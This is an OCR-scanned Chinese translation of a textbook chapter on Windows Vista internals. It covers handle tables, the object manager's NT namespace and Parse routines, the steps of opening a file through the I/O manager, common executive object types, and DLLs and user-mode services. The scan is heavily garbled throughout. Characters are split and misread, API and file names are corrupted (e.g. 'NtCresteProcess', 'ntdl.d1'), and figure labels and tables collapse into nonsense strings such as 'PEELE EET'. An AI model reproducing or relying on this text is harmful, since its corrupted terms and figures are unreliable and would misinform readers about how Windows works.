图 11-19 显 示 ， 人 句柄 表 最 大 文 持 两 个 额外 的 间接 层 。 这 使 得 在 内 核 
态 中 执行 代码 能 够 方便 地 使 用 句柄 ， 而 不 是 引用 指针 。 内 核 句柄 部 是 经 
过 特殊 编码 的 ， 从 而 它们 能 够 与 用 户 态 的 句柄 区 分 开 。 内 核 句柄 部 保存 
在 系统 进程 的 句柄 表 里 ， 而 且 不 能 以 用 户 态 存 取 。 就 像 大 部 分 内 核 虚 拟 











地 址 空间 被 所 有 进程 共 齐 ， 系 统 句 柄 表 由 所 有 的 内 核 成 分 共享 ， 无 论 当 
前 的 用 户 态 进程 是 什么 


句柄 表 描 述 符 D: 句 柄 表 入 口 [32] 
PEELE EET 
B: 句 柄 表 入 口 [1024] 


有 
A: 句 柄 表 入 口 [512] HUTT ETT 





UTE FE: 句柄 表 入 口 [512] 
II 
| IS | 
AVS CANA F512] 
WATT 


图 11-19 最 多 达到 1600 万 个 句柄 的 句柄 表 数 据 结 构 


用 户 可 以 通过 Win32 调 用 的 CreateSemaphore 或 OpenSemaphore 来 创 
建新 的 对 象 或 打开 一 个 已 经 存在 的 对 象 。 这 些 都 是 对 程序 库 的 调用 ， 并 
且 最 后 会 转 同 适当 的 系统 调用 。 任 何 成 功 创建 或 打开 对 象 的 指令 的 结 
果 ， 都 是 储存 在 内 核 内 存 的 进程 私有 人 句柄 表 的 一 个 64 位 句柄 表 入 口 。 表 
中 句柄 人 逻辑 位 置 的 32 位 索引 返回 给 用 户 用 于 随后 的 指令 。 内 核 的 64 位 句 
柄 表 入 口 包含 两 个 32 位 字 节 。 一 个 字 节 包含 29 位 指针 指 网 包头 。 其 后 的 
3 位 作为 标志 例如， 表示 句柄 是 否 被 它 创 建 的 进程 继承 )。 这 3 位 在 指 
针 束 位 以 前 是 被 屏蔽 掉 的 。 其 他 的 字 节 包含 一 个 32 位 正确 掩 码 。 这 是 必 
需 的 因为 只 有 在 对 象 创建 或 打开 的 时 候 许可 校 验 才 会 进行 。 如 果 一 个 进 














程 对 某 对 象 只 有 只 读 的 权限 ， 那 在 表示 其 他 在 掩 码 中 的 权限 位 都 为 0， 
从 而 让 操作 系统 可 以 拒绝 除 读 之 外 对 对 象 进行 任何 其 他 的 操作 。 


2. 对 象 名 字 空 间 


进程 可 以 通过 由 一 个 进程 把 到 对 象 的 句柄 复制 给 其 他 进程 来 共 孚 对 
象 。 但 是 这 需要 复制 的 进程 有 到 其 他 进程 的 句柄 ， 而 这 样 在 多 数 情况 中 
并 不 适用 ， 例 如 进程 共 圣 的 对 象 是 无 关 的 或 被 其 他 进程 保护 的 。 在 其 他 
情况 下 ， 对 象 即使 在 不 被 任何 进程 调用 的 时 候 仍 然 保 持 存 在 是 非常 重要 
的 ， 例 如 表示 物理 设备 的 对 象 ， 或 用 户 实 现 对 象 管 理 占 和 它 自 己 的 NT 
名 字 空 间 的 对 象 。 为 了 地 址 的 全 面 分 享 和 持久 化 需求 ， 对 象 管理 允许 随 
意 的 对 象 在 被 创建 的 时 候 就 给 定 其 NT 名 字 空 间 中 的 名 字 。 然 而 ， 是 由 
执行 部 件 控制 特定 类 型 的 对 象 来 提供 接口 ， 以 使 用 对 象 管理 器 的 命名 功 
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NI 名 字 空 间 是 分 级 的 ， 借 由 对 象 管理 器 实现 目录 和 特征 连接 。 名 
字 空 间 也 是 可 扩展 的 ， 通 过 提供 一 个 叫做 Parse 的 进程 程序 允许 任何 对 象 
类 型 指定 名 字 空 间 扩展 。Parse 程 序 是 一 个 可 以 提供 给 每 一 个 对 象 类 型 的 


对 象 创建 时 使 用 的 程序 ， 如 图 11-20 所 示 。 








使 用 时 候 备注 
用 于 每 个 新 的 句柄 很 少 使 用 


用 于 扩展 名 字 空 间 的 对 象 类 型 用 于 文件 和 档案 密 钥 
最 后 句柄 关闭 清除 可 见 结果 


最 后 一 个 指针 撤销 对 象 将 被 删除 
三 到 或 设置 对 象 的 安全 据 还 符 
得 到 对 象 名 称 外 核 很 少 使 用 


图 11-20 用 于 指定 一 个 新 对 象 类 型 的 对 象 语 铝 





Open 语 句 很 少 使 用 ， 因 为 默认 对 象 管理 器 的 行为 才 是 必需 的 ， 所 以 
程序 为 所 有 基本 对 象 类 型 指定 为 NULL。 








Close 和 Delete 语 句 描述 对 象 完成 的 不 同 阶段 。 当 对 象 的 最 后 一 个 名 
柄 关闭 ， 可 能 会 有 必要 的 动作 清空 状态 ， 这 些 由 Close 语 句 来 执行 ， 当 
最 后 的 指针 参考 从 对 象 移 除 ， 使 用 Delete 语 句 ， 从 而 对 象 可 以 准备 被 删 
除 并 使 其 内 存 可 以 重用 。 利 用 文件 对 象 ， 这 两 个 语句 都 实现 为 VO 管理 
器 里 面 的 回调 ，IO 管 理 器 是 声明 了 对 象 类 型 的 组 件 。 对 象 管理 操作 使 
得 由 设备 堆栈 发 送 的 MO 操作 能 够 与 文件 对 象 关 联 上 ， 而 大 多 数 这 些 工 
作 由 文件 系统 完成 。 





Parse 语 句 用 来 打开 或 创建 对 象 ， 如 文件 和 登录 密码 ， 以 及 扩展 NT 
名 字 空 间 。 当 对 象 管理 需 试 图 通过 名 称 打 开 一 个 对 象 并 遭遇 其 管理 的 名 
字 空 间 树 的 叶 结 皮 ， 它 检查 该 叶 结 点 对 象 类 型 是 否 指 定 了 一 个 Parse 语 
句 。 如 果 有 ， 它 会 引用 该 语句 ， 将 路 径 名 中 未 用 的 部 分 传 给 它 。 再 以 文 
件 对 象 为 例 ， 叶 子 结 点 是 一 个 表现 特定 文件 系统 卷 的 设备 对 象 。Parse 语 


句 由 IO 管理 器 执行 ， 并 发 起 在 对 文件 系统 的 IO 操作 ， 以 填充 一 个 指 回 
文件 的 公开 实例 到 该 文件 对 象 ， 这 个 文件 是 由 路 径 名 指定 的 。 我 们 将 在 
以 后 逐步 探索 这 个 特殊 的 实例 。 





QueryName 语 句 是 用 来 得 找 与 对 象 天 联 的 名 字 。Security 语 句 用 于 
得 到 、 设 置 或 删除 该 安全 描述 符 的 对 象 。 对 于 大 多 数 类 型 的 对 象 ， 此 程 
序 在 执行 的 安全 引用 监视 器 组 件 里 提供 一 个 标准 的 切入 点 。 








注意 ， 在 图 11-20 里 的 语句 并 不 执行 每 种 对 象 类 型 最 感 兴趣 的 操 
作 。 相 反 ， 这 些 程序 提供 给 对 象 管理 器 正确 实现 功能 所 需要 的 回调 函 
数 ， 如 提供 对 对 象 的 访问 和 对 象 完成 时 的 清理 工作 。 除 了 这 些 回调 ， 对 
象 管 理 器 还 提供 了 一 套 通 用 对 象 例 程 ， 例 如 创建 对 象 和 对 象 类 型 ， 复 制 
句柄 ， 从 句柄 或 者 名 字 获 得 引用 指针 ， 并 增加 和 减 去 对 象 头 部 的 参考 计 
数 。 

















对 象 感 兴趣 的 操作 都 是 在 本 地 NT API 系 统 调 用 ， 如 
NtCresteProcess、NtCreateFile 或 NtClose 〈 关 闭 句 柄 所 有 类 型 的 通用 操 
YE) ， 如 图 11-9 所 示 。 





虽然 对 象 名 字 空 间 对 整个 运作 的 系统 是 至 关 重 要 的 ， 但 却 很 少 有 人 
知道 它 的 存在 ， 因 为 没有 特殊 的 浏览 工具 的 话 它 对 用 户 是 不 可 见 的 。 
winobj 就 是 一 个 这 样 的 浏览 工具 ， 在 


www.microsoft.com/technet/sysinternals 可 免费 获得 。 在 运行 时 ， 此 工具 








描绘 的 对 象 的 名 字 空 间 通 常 包含 对 象 目录 ， 如 图 11-21 列 出 来 的 及 其 他 


SR 











22 查找 类 似 C: 的 MS-DOS 设 备 的 查找 起 始 位 置 
DosDevices 目录 ?? 

所 有 1/O 设 备 
Driver 每 个 加 载 的 设备 驱动 对 应 的 对 象 




















ObjectTypes 如 图 11-22 中 列 出 的 类 型 的 对 象 
Windows 发 送 消息 到 所 有 Win32 GUI 窗口 的 对 象 











T eB A 


BaseNamedObjects 用 户 创建 的 Win32 对 象 ， 如 信号 量 、 互 斥 量 等 
Arcname 由 启动 装载 器 发 现 的 分 区 名 称 

NLS National 语 言 支持 对 象 

FileSystem 文件 系统 驱动 对 象 和 文件 系统 识别 对 象 
Security 安全 系统 的 对 象 

KnownDLLs 较 早 开启 和 一 直 开 启 的 关键 共享 库 


























图 11-21 在 对 象 名 字 空 间 中 的 一 些 典型 目录 





一 个 被 奇怪 地 命名 为 \?? 的 目录 包含 用 户 的 所 有 MS-DOS 类 型 的 设备 
名 称 ， 如 A: 表示 软驱 ，C: 表示 第 一 块 硬 盘 。 这 些 名 称 其 实 是 在 设备 
对 象 活跃 的 地 方 链 接 到 目录 \ 装 置 的 符号 。 使 用 名 称 \?? 是 因为 其 按 字 母 
顺序 排列 第 一 ， 以 加 快 查询 从 驱动 器 盘 符 开始 的 所 有 路 径 名 称 。 其 他 的 
对 象 目录 的 内 容 应 该 是 自 解释 的 。 





如 上 所 述 ， 对 象 管理 器 保持 一 个 单独 的 句柄 为 每 个 对 象 计 数 。 这 个 
计数 是 从 来 不 会 大 于 指针 引用 计数 ， 因 为 每 个 有 效 的 句柄 对 象 在 它 的 句 
顶 表 入 口 有 一 个 引用 指针 。 使 用 单独 句柄 计数 的 理由 是 ， 当 最 后 一 个 用 








户 态 的 引用 消失 的 时 候 ， 许 多 类 型 的 对 象 可 能 需要 清理 目 己 的 状态 ， 尽 
管 它们 尚未 准备 好 让 它们 的 内 存 删除 。 


以 一 个 文件 对 象 为 例 表 示 一 个 打开 文件 的 实例 。Windows 系 统 中 文 
件 被 打开 以 供 独占 访问 。 当 文件 对 象 的 最 后 一 个 句柄 被 关闭 ， 重 要 的 是 
在 那 一 刻 就 应 该 删除 专 有 访问 ， 而 不 是 等 待 任何 内 核 引 用 最 终 消 失 例 
如 ， 在 最 后 一 次 从 和 内存 冲洗 数据 之 后 。) 否则 ， 从 用 户 态 关 闭 并 重新 打 
开 一 个 文件 可 能 无 法 按 预 期 的 方式 工作 ， 因 为 该 文件 看 来 仍然 在 使 用 
中 。 











虽然 对 象 管理 器 在 内 核 具 有 全 面 的 管理 机 制 来 管理 内 核 中 的 对 象 生 
命 周期 ， 不 论 是 NT API 或 Win32API 的 都 没有 提供 一 个 引用 机 制 来 处 理 
在 用 户 态 的 并 行 多 线程 之 间 的 句柄 使 用 。 从 而 多 线程 并 发 访问 句柄 会 之 
来 竞争 条 件 (race condition) 和 bug， 例 如 ， 可 能 发 生 一 个 线程 在 别 的 线 
程 使 用 完 特 定 的 句柄 之 前 就 把 它 关 团 了 。 或 者 多 次 关闭 一 个 句柄 。 或 者 
关闭 另 一 个 线程 仍然 在 使 用 的 句柄 ， 然 后 重新 打开 它 指 向 不 同 的 对 象 。 








也 许 Windows 的 API 应 该 被 设计 为 每 个 类 型 对 象 市 有 一 个 关闭 APL 
而 不 是 单一 的 通用 NTClose 操 作 。 这 将 至 少 会 减少 由 于 用 户 态 线程 关闭 
了 错误 的 处 理 而 发 生 错误 的 频率 。 另 一 个 解决 办 法 可 能 是 在 句柄 表 中 的 
指针 之 外 再 添加 一 个 序列 域 。 





为 了 帮助 程序 开发 人 员 在 他 们 的 程序 中 寻找 这 些 类 似 的 问题 ， 


Windows 有 一 个 应 用 程序 验证 ， 软 件 开 发 商 能 够 从 Microsoft 下 载 。 我 们 
将 在 11.7 节 介绍 类 似 的 驱动 程序 的 验证 器 ， 应 用 程序 验证 吉 通 过 大 量 的 
规则 检查 来 帮助 程序 员 寻 找 可 能 通过 普通 测试 无 法 发 现 的 错误 。 它 也 可 
以 为 句柄 释放 列表 月 用 先进 先 出 顺序 ， 以 便 句 柄 不 会 被 立即 重用 《〈 即 天 
闭 句柄 表 通 常 采 用 效果 较 好 的 LIFO 排 序 ) 。 防 止 句柄 被 立即 重用 的 情 

况 发 生 ， 在 这 些 转 化 的 情况 下 操作 可 能 错误 地 使 用 一 个 已 经 关闭 的 句 

柄 ， 这 是 很 容易 检测 到 的 。 











该 设备 对 象 是 执行 体 中 一 个 最 重要 的 和 贯穿 内 核 态 的 对 象 。 该 类 型 
是 由 IO 管理 器 指定 的 ，IO 管 理 器 和 设备 驱动 是 设备 对 象 的 主要 使 用 
者 。 设 备 对 象 和 驱动 程序 是 密切 相关 的 ， 每 个 设备 对 象 通常 有 一 个 链接 
指向 一 个 特定 的 驱动 程序 对 象 ， 它 描述 了 如 何 访 问 设备 驱动 程序 所 对 应 
的 VO 处 理 例 程 。 








设备 对 象 代表 硬件 设备 、 接 口 和 总 线 ， 以 及 逻辑 磁盘 分 区 、 磁 盘 卷 
甚至 文件 系统 、 扩 展 内 核 ， 例 如 防 病 毒 过 滤器 。 许 多 设备 驱动 程序 都 有 
给 定 的 名 称 ， 这 样 就 可 以 访问 它们 ， 而 无 需 打 开设 备 的 实例 的 句柄 ， 如 
在 UNIX 中 。 我 们 将 利用 设备 对 象 以 说 明 Parse 程 序 是 如 何 被 使 用 的 ， 如 
图 11-22 所 示 。 





Win32 CreateFile(C:\foo\bar) 


[Py 
(10) 













内 核 态 








Harddisk1 


sag (G4) ---------+ 
seared 


文件 系统 过 滤器 |-…- ee ar 
‘ DEVICE OBJECT: ， 
(5) ¥ loCallDriver ' for C: Volume ; 


~~ Pee a ee 
NtfsCreateFile() |loCompleteRequest : SYMLINK: ‘ 


:\Devices\Harddisk1 ; 


a) b) 


C: 的 设备 堆栈 
(7) 





图 11-22 IV/O 和 对 象 管理 器 创建 /打开 文件 并 返回 文件 匈 柄 的 步骤 


1) 当 一 个 执行 组 件 ， 如 实现 了 本 地 系统 调用 NTCreateFile 的 1/O 管 理 
器 ， 在 对 象 管理 器 中 称 之 为 ObOpenObjectByName， 它 发 送 一 个 NT 名 字 
空间 的 Unicode 路 和 会 名 ， 例 如 \??\C:\foo\bar。 





2) 对 象 管理 器 通过 目录 和 符号 链接 表 搜 索 并 最 终 认 定 \??\C: 指 的 是 
设备 对 象 (IO 管理 器 定义 的 一 个 类 型 ) 。 该 设备 对 象 在 由 对 象 管理 器 
管理 的 NI 名 字 空 间 中 一 个 时节 点 。 


3) 然 后 对 象 管理 器 为 该 对 象 类 型 调用 Parse 程 序 ， 这 恰好 是 由 IO 管 
理 器 实现 的 lopParseDevice。 它 不 仪 传递 一 个 指针 给 它 发 现 的 设备 对 象 
CC: ) ， 而 且 还 把 剩 下 的 字符 串 \foo\bar 也 友 送 过 去 。 


4)1/O 管 理 器 将 创建 一 个 IRP (VOWEL) ， 分 配 一 个 文件 对 象 ， 发 
送 请 求 到 由 对 象 管理 器 确定 的 设备 对 象 发 现 的 VO 设备 堆栈 。 





5)IRP 是 在 IO 堆栈 中 逐 级 传递 ， 直 到 它 到 达 一 个 代表 文件 系统 C: 
实例 的 设备 对 象 。 在 每 一 个 阶段 ， 控 制 是 通过 一 个 与 这 一 等 级 设备 对 象 
相连 的 切入 点 传递 到 驱动 对 象 内 部 。 切 入 点 用 在 这 种 情况 下 ， 是 为 了 支 
持 CREATE 操 作 ， 因 为 要 求 是 创建 或 打开 一 个 名 为 Moo\bar 的 文件 。 





6) 该 设备 对 象 中 遇 到 指向 文件 系统 的 IRP 可 以 表示 为 文件 系统 筛选 
驱动 程序 ， 这 可 能 在 该 操作 到 达 对 应 的 文件 系统 设备 对 象 之 前 修改 VO 
操作 。 通 党 情况 下 这 些 中 间 设 备 代表 系统 扩展 ， 例 如 反 病 毒 过 小 器。 





7) 文 件 系统 设备 对 象 有 一 个 链接 到 文件 系统 驱动 程序 对 象 ， 叫 
NTFS。 因 此 ， 驱 动 对 象 包含 NTFS 内 创建 操作 的 地 址 范围 。 





8)NTFS 将 填补 该 文件 中 的 对 象 并 将 它 返回 到 IO 管理 器 ，LIO 管 理 吉 
备份 扒 栈 中 的 所 有 设备 ， 直 到 lopParseDevice 返 回 对 象 管理 器 〈 如 11.8 节 
所 述 ) 。 


9) 在 对 象 管理 器 以 其 名 字 空 间 中 的 碍 找 结束 。 它 从 Parse 程 序 收 到 一 
个 初始 化 对 象 〈 这 正好 是 一 个 文件 对 象 ， 而 不 是 原来 对 象 发 现 的 设备 对 
象 ) 。 因 此 ， 对 象 管理 器 为 文件 对 象 在 目前 进程 的 句柄 表 里 创建 了 一 个 
句柄 ， 并 对 需求 者 返回 句柄 。 











10) 最 后 一 步 是 返回 用 户 态 的 调用 者 ， 在 这 个 例子 里 就 是 Win32 API 


CreateFile， 它 会 把 句柄 返回 


可 执行 组 件 能 够 通 


给 应 用 程序 。 


过 调用 ObCreateObjectType 接 口 给 对 象 管理 器 来 








动态 创建 新 的 类 型 。 由 于 每 次 发 布 都 在 变化 ， 所 以 没有 一 个 限定 的 对 象 
类 型 定义 表 。 图 11-23 列 出 了 在 Windows Vista 中 非常 通用 的 一 些 对 象 类 


供 快速 参考 。 


类 型 


Object directory 
Symbolic link 


Device driver 


用 户 进程 

进程 里 的 线程 

进程 内 部 同步 的 信号 量 

用 来 控制 进入 关键 区 域 的 二 进 制 信号 量 

具有 持久 状态 〈 已 标记 信和 号 \ 未 标记 信号 ) 的 同步 对 象 
内 部 进程 消息 传递 的 机 制 

允许 一 个 线程 固定 时 间 间 隔 休 眠 的 对 象 

用 来 完成 异步 IO 通知 的 对 象 

关联 到 某 个 打开 的 文件 的 对 象 

某 个 对 象 的 安全 描述 符 

描述 CPU 使 用 情况 的 数据 结构 

表述 映射 的 文件 的 对 象 

注册 表 关 键 字 ， 用 于 把 注册 信息 关联 到 某 个 对 象 管理 名 字 空 间 
对 象 管理 器 中 一 组 对 象 的 目录 

通过 路 径 名 引用 到 另 一 个 对 象 管理 器 对 象 

物理 设备 、 总 线 、 驱 动 或 者 卷 实 例 的 IO 设备 对 象 
每 一 个 加 载 的 设备 驱动 都 有 它 自 己 的 一 个 对 象 





图 11-23 对 象 管理 器 管理 的 一 些 通用 可 执行 对 象 类 型 


进程 〈process) 和 线程 (thread) 是 明显 的 。 每 个 进程 和 每 个 线程 
都 有 一 个 对 象 来 表示 ， 这 个 对 象 包含 了 管理 进程 或 线程 所 需 的 主要 属 





性 。 接 下 来 的 三 个 对 象 : 信号 量 、 互 斥 体 和 事件 ， 都 可 以 处 理 进 程 间 的 
同步 。 信 号 量 和 互 斥 体 按 预期 方式 工作 ， 但 都 需要 额外 的 啊 铃 和 警 哨 

(例如 ， 最 大 值 和 超时 设 定 )。 事 件 可 以 在 两 种 状态 之 一 : 已 标记 信号 
或 未 标记 信和 号。 如 果 一 个 线程 等 待 事件 处 于 已 标记 信和 号 状态 ， 线 程 被 立 
即 释放 。 如 有 果 该 事件 是 未 标记 信号 状态 ， 它 会 一 直 阻 赛 直 到 一 些 其 他 线 
程 信号 释放 所 有 被 阻止 的 线程 (通知 事件 〉 的 活动 或 只 是 第 一 个 被 阻止 
的 线程 (同步 事件 ) 。 也 可 以 设置 一 个 事件 ， 这 样 一 种 信号 成 功 等 符 

后 ， 它 会 目 动 恢复 到 该 未 标记 信号 的 状态 而 不 是 处 在 已 标记 信号 状态 。 
































端口 、 定 时 器 和 队列 对 象 也 与 通信 和 同步 相关 。 端 口 是 进程 之 间 交 
换 LPC 消 息 的 通道 。 定 时 器 提供 一 种 为 特定 的 时 间 区 间 内 阻塞 的 方法 。 
队列 用 于 通知 线程 已 完成 以 前 启动 的 异步 IO 操作 ， 或 一 个 端口 有 消息 
等 待 。〔( 它 们 被 设计 来 管理 应 用 程序 中 的 并 发 的 水 平 ， 以 及 在 使 用 高 性 
能 多 处 理 器 应 用 中 使 用 ， 如 SQL) 。 





当 一 个 文件 被 打开 时 ，Open file 对 象 将 会 被 创建 。 没 打开 的 文件 ， 
并 没有 对 象 由 对 象 管理 需 管 理 。 访 问 令 牌 是 安全 的 对 象 。 它 们 识别 用 
户 ， 并 指出 用 户 具 有 什么 样 的 特权 ， 如 果 有 的 话 。 配 置 文件 是 线程 的 用 
于 存储 程序 计数 器 的 正在 运行 的 周期 样本 的 数据 结构 ， 用 以 确定 程序 线 
程 的 时 间 是 花 在 哪些 地 方 了 。 











段 用 来 表示 内 存 对 象 ， 这 些 内 存 对 象 可 以 被 应 用 程序 问 内 存 管 理 器 
请 求 ， 将 应 用 程序 的 地 址 空间 映射 到 这 个 区 域 中 来 。 和 它们 记录 表示 倒 盘 








上 的 内 存 对 象 的 页 的 文件 (或 页 面 文件 ) 的 段 。 键 表示 的 是 象 管理 名 字 
空间 的 注册 表 名 字 空 间 的 加 载 点 。 通 常 只 有 一 个 名 为 REGISTRY 关 键 对 
象 ， 负 责 链接 到 注册 表 键 值 和 NT 名 字 空 间 的 值 。 





对 象 目录 和 符号 链接 完全 是 本 地 对 象 管理 器 的 NT 名 字 空 间 的 一 部 
分 。 它 们 是 类 似 于 和 它们 对 应 的 文件 系统 部 分 :目录 允许 要 收集 一 些 相 
关 的 对 象 。 符 号 链接 允许 对 象 名 字 空 间 来 引用 一 个 对 象 名 字 空 间 的 不 同 
部 分 中 的 对 象 的 一 部 分 的 名 称 。 














每 个 已 知 的 操作 系统 的 设备 有 一 个 或 多 个 设备 对 象 包含 有 关 它 的 信 
恩 ， 并 且 由 系统 引用 该 设备 。 最 后 ， 每 个 已 加 载 设备 驱动 程序 在 对 象 空 
间 中 有 一 个 驱动 程序 对 象 。 驱 动 程序 对 象 被 所 有 那些 表示 被 这 些 驱 动 控 
制 的 设备 的 实例 共享 。 








其 他 没有 介绍 的 对 象 有 更 多 特别 的 目的 ， 如 同 内 核 事 务 的 交互 或 
Win32 线 程 池 的 工作 线程 工厂 交互 。 


11.3.4 子 系 统 、DLL 和 用 户 态 服务 


回 到 图 11-6， 我 们 可 以 看 到 Windows Vista 操 作 系 统 是 由 内 核 态 中 的 
组 件 和 用 户 态 的 组 件 组 成 的 。 现 在 我 们 已 经 介绍 完了 我 们 的 内 核 态 组 
件 ， 因 此 ， 我 们 接 下 来 看 看 用 户 态 组 件 。 其 中 对 于 Windows 有 三 种 组 件 
尤为 重要 : 环境 子 系统 、DLL 和 服务 进程 。 


我 们 已 介绍 Windows 子 系统 模型 ， 所 以 这 里 不 作 更 多 详细 介绍 ， 而 
主要 是 关注 原始 设计 的 NT， 子 系统 被 视 为 一 种 利用 内 核 态 运行 相同 底 
层 软 件 来 支持 多 个 操作 系统 个 性 化 的 方法 。 也 许 这 是 试图 避免 操作 系统 
竞争 相同 的 平台 ， 例 如 在 DEC 的 VAX 上 的 VMS 和 Berkeley UNIX。 或 者 
也 许 在 微软 没有 人 知道 0S/2 是 否 会 成 为 一 个 成 功 的 编程 接口 ， 他 们 加 上 
了 他 们 的 投注 。 结 果 ，OS/2 成 为 无 关 的 后 来 者 ， 而 Win32 API 设 计 为 与 
Windows 95 结 合并 成 为 主导 。 








Windows 用 户 态 设 计 的 第 二 个 重要 方面 是 在 动态 链接 库 (DLL) ， 
即 代 码 是 在 程序 运行 的 时 候 完 成 的 链接 ， 而 非 编译 时 。 共 享 的 库 不 是 一 
个 新 的 概念 ， 最 现代 化 的 操作 系统 使 用 它们 。 在 Windows 中 几乎 所 有 库 
都 是 DLL， 从 每 一 个 进程 都 装载 的 系统 库 ntdl.d1 到 旨 在 允许 应 用 程序 开 
发 人 员 进行 代码 通用 的 功用 函数 的 高 层 程 序 库 。 








DLL 通过 允许 在 进程 乙 间 共享 通用 代码 来 提高 系统 效率 ， 保 持 癌 用 


代码 在 内 存 中 ， 处 理 减 少 从 程序 磁盘 到 内 存 中 的 加 载 时 间 。 并 人 允许 操作 
系统 的 库 代 码 进行 更 新 时 无 需 重 新 编译 或 重新 链接 所 有 使 用 它 的 应 用 程 
序 ， 从 而 提高 系统 的 使 用 能 











此 外 ， 共 享 的 库 介 绍 版 本 控制 的 问题 ， 并 增加 系统 的 复杂 性 ， 因 为 
为 帮助 某 些 特 定 的 应 用 而 引入 的 更 改 可 能 会 给 其 他 的 一 些 特 定 的 应 用 带 
来 可 能 的 错误 ， 或 者 因为 实现 的 改变 而 破坏 了 一 些 其 他 的 应 用 一 一 这 是 
一 个 在 Windows 世 界 称 为 DLL 黑洞 的 问题 。 








DLE 的 实现 在 概念 上 是 简单 的 。 并 非 直 接 调 用 相同 的 可 执行 映像 中 
的 子 例 程 的 代码 ， 一 定 程 度 的 间接 性 引用 被 编译 器 引入 : AT CFA 
址 表 ) 。 当 可 执行 文件 被 加 载 时 ， 它 查找 也 必须 加 载 的 DLL 的 列表 〈 这 
将 是 一 个 图 结构 ， 因 为 这 些 DLL 本 里 会 指定 它们 所 需要 的 其 他 的 DLL 列 
K) 。 所 需 的 DLL 被 加 载 并 且 填 写 好 它们 的 IAT。 





现实 是 更 复杂 的 。 男 一 个 问题 是 代表 DLL 之 间 的 关系 图 可 以 包含 
环 ， 或 具有 不 确定 性 行为 ， 因 此 计算 要 加 载 的 DLL 列表 可 以 导致 不 能 运 
行 的 结果 。 此 外 ， 在 Windows 中 DLL 代码 库 有 机 会 来 运行 代码 ， 只 要 它 
们 加 载 到 了 进程 中 或 者 创建 一 个 新 线程 。 通 常 ， 这 是 使 它们 可 以 执行 初 
始 化 ， 或 为 每 个 线程 分 配 存储 空间 ， 但 许多 DLL 在 这 些 附 加 例 程 中 执行 
大 量 的 计算 。 如 果 任 何 函 数 调 用 的 一 个 附加 例 程 需 要 检查 加 载 的 DLL 列 
表 ， 死 锁 可 能 会 友 生 在 这 个 过 程 。 

















DLL 用 于 不 仅仅 共享 常见 的 代码 。 它 们 还 可 以 启用 一 种 宿主 的 扩展 
应 用 程序 模型 。Internet Explorer 可 以 下 载 并 链接 到 DLL 调用 ActiveX 控 
件 。 另 一 端 互联 网 的 Web 服务 器 也 加 载 动态 代码 ， 以 为 它们 所 显示 的 网 
页 产生 更 好 的 web 体验。 像 Microsoft Office 的 应 用 程序 允许 链接 并 运行 
DLL， 使 得 Office 可 以 类 似 一 个 平台 来 构建 新 的 应 用 程序 。COM (组 件 
对 象 模 型 ) 编程 模式 允许 程序 动态 地 查找 和 加 载 编 写 来 提供 特定 发 布 接 
口 的 代码 ， 这 就 导致 几乎 所 有 使 用 COM 的 应 用 程序 都 以 in-process 的 方 
式 来 托管 DLL。 





所 有 这 类 动态 加 载 的 代码 ， 为 操作 系统 造成 了 更 大 的 复杂 性 ， 因 为 
程序 库 的 版 本 管理 不 是 只 为 可 执行 体 匹 配对 应 版 本 的 DLL， 而 是 有 时 把 
多 个 版 本 的 同一 个 DLL 加 载 到 进程 中 一 一 Microsoft 称 之 为 户 并 肩 (side- 
by-side) 。 单 个 的 程序 可 以 承载 两 个 不 同 的 DLL， 每 个 可 能 要 加 载 同一 
但 对 该 库 的 版 本 有 不 同 要 求 。 




















个 Windows 库 


较 好 的 解决 方案 是 把 代码 放 到 独立 的 进程 里 。 而 在 进程 外 承载 的 代 
码 结果 具有 较 低 的 性 能 ， 并 在 很 多 情况 下 会 带 来 一 个 更 复杂 的 编程 模 
型 。 微 软 尚 未 提供 在 用 户 态 下 来 处 理 这 种 复杂 度 的 一 个 好 的 解决 办 法 。 
但 这 让 人 对 相对 简单 的 内 核 态 产生 了 希望 。 











该 内 核 态 具有 较 少 的 复杂 性 ， 是 因为 它 相 对 于 用 户 态 提供 了 更 少 的 
对 外 部 设备 驱动 模型 的 支持 。 在 Windows 中 ,系统 功能 的 扩展 是 通过 编写 
用 户 态 服务 来 实现 的 。 这 对 于 子 系统 运行 得 很 好 ， 并 且 在 只 有 很 少 更 新 





的 时 候 ， 而 不 是 整个 系统 的 个 性 化 的 情况 下 ， 能 够 取得 更 好 的 性 能 。 在 
内 核实 现 的 服务 和 在 用 户 态 进程 实现 的 服务 之 间 只 有 很 少 的 功能 性 差 
异 。 内 核 和 过 程 都 提供 了 专用 地 址 空间 ， 可 以 保护 数据 结构 和 服务 请 求 
可 以 被 审议 。 


但 是 ， 可 能 会 与 服务 的 用 户 态 处 理 内 核 中 服务 有 重大 的 性 能 差异 。 
通过 现代 的 硬件 从 用 户 态 进 入 内 核 是 很 慢 的 ， 但 是 也 比 不 上 要 来 回 切换 
两 次 的 更 慢 ， 因 为 还 需要 从 内 存 切 换 出 来 进入 为 一 个 进程 。 而 且 跨 进程 


通信 市 党 较 低 。 








内 核 态 代码 (非常 仔细 地 〉 可 以 把 用 户 态 处 理 的 数据 作为 参数 传递 
给 其 系统 调用 的 方式 来 访问 数据 。 通 过 用 户 态 的 服务 ， 数 据 必须 被 复制 
到 服务 进程 或 由 映射 内 存 等 提供 的 一 些 机 制 CWindows Vista 中 的 ALPC 
功能 在 后 台 处 理 ) 。 





将 来 跨 地 址 空间 的 切换 代价 很 可 能 会 越 来 越 小 ， 保 护 模式 将 会 减 
少 ， 或 甚至 成 为 不 相关 。 在 Singularity 中 ， 微 软 研究 院 (Fandrich 等 人 ， 
2006 年 ) 使 用 运行 时 技术 ， 类 似 C# 和 Java， 用 来 做 一 个 完全 软件 问题 的 
保护 。 这 就 要 求 地 址 空间 的 切换 或 保护 模式 下 没有 硬件 的 切换 代价 。 


Windows Vista 利 用 用 户 态 的 服务 进程 极 大 地 提升 了 系统 的 性 能 。 其 
中 一 些 服务 是 同 内 核 的 组 件 紧 密 相 关 的 ， 例 如 lsass.exe 这 个 本 地 安全 纺 
TUES, CREST RANA ANSE Coken) 对 象 ， 以 及 文件 





系统 用 来 加 密 的 密 钥 。 用 户 态 的 即 插 即 用 管理 喜 负 责 确 定 要 使 用 新 的 硬 
件 设 备 所 需要 的 正确 的 驱动 程序 来 安装 它 ， 并 告诉 内 核 加 载 它 。 系 统 的 
很 多 功能 是 由 第 三 方 提供 的 ， 如 防 病毒 程序 和 数字 版 权 管 理 ， 这 些 功能 
都 是 作为 内 核 态 驱动 程序 和 用 户 态 服务 的 组 合 方式 实现 的 。 





在 Windows Vista 中 taskmgr.exe 有 一 个 选项 卡 ， 标 识 在 系统 上 运行 的 
服务 。〔 早 期 版 本 的 Windows 将 显示 服务 使 用 net start 命 令 的 列表 ) 。 很 
